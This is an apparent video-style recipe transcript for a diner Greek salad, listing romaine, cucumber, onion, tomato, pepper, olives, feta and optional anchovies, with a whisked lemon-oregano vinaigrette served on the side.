Greek Salad Recipe

Greek Salad with dressing Recipe. Hi guys, today I’ll show you how make a diner style greek salad with dressing. We’ll need a few cups of romaine lettuce cut up. 1 english cucumber cut into bite size pieces. ¼ of a red onion sliced thinly, 1 tomato cut into small pieces, 1 medium green bell pepper cut up. Kalamata olives about ¼ cup. Feta cheese, now usually it comes in a block like this, sometimes in water. You can also buy it crumbled. I like to buy it whole and cut it up into small cubes. These are anchovies and they are optional. I know some people don’t like them because they have a strong taste. These come in a jar or can in oil. Anchovies are extremely healthy, they are good for your skin, contain omega 3 fatty acid and a good source of protein. If you order a greek salad at a diner, the waitress will usually ask if you want anchovies or not with your salad. As for the dressing, we’ll use some fresh lemon juice, red wine vinegar, olive oil, 2 cloves of garlic, here I have salt, sugar and black pepper. This is 1 tsp of dried oregano which is essential to this greek dressing. We’ll make the dressing in this measuring cup, it’s easy to pour since it has a spout. You can also pour all the ingredients in an empty bottle and shake it up.

Squeeze 1 tblsp of lemon juice into the cup. Add 1 tbsp of red wine vinegar. Now add in 6 tbsps of extra virgin olive oil. Add ½ tsp salt, ½ tsp sugar, ¼ tsp pepper. Take the 1 tsp dried oregano and rub it in your palms to release the oil. Smash the garlic, peel and grate it into the cup. Whisk this really well. This is a great dressing for any salad, it’s very tasty and well balanced.

Get a big bowl and pour in the chopped romaine. Tear up the bigger pieces. To save time, I buy the prewashed cut up romaine in bags. Now I’ll add the 1 english cucumber cut up, ¼ red onion sliced, 1 tomato cut up, 1 green bell pepper cut up. ¼ cup of olives. Cut up the cheese into small cubes. Add the cheese to the salad. Now with the dressing, I serve it on the side because some people want dressing and others don’t. If your family likes the salad dressed, pour the dressing into the bowl and toss it. Remember if you’re going to save leftovers in the fridge, it’s best that you don’t pour dressing into the salad, the salad will keep better in the fridge without the dressing on it. And don’t forget the anchovies…they are really tasty and salty.
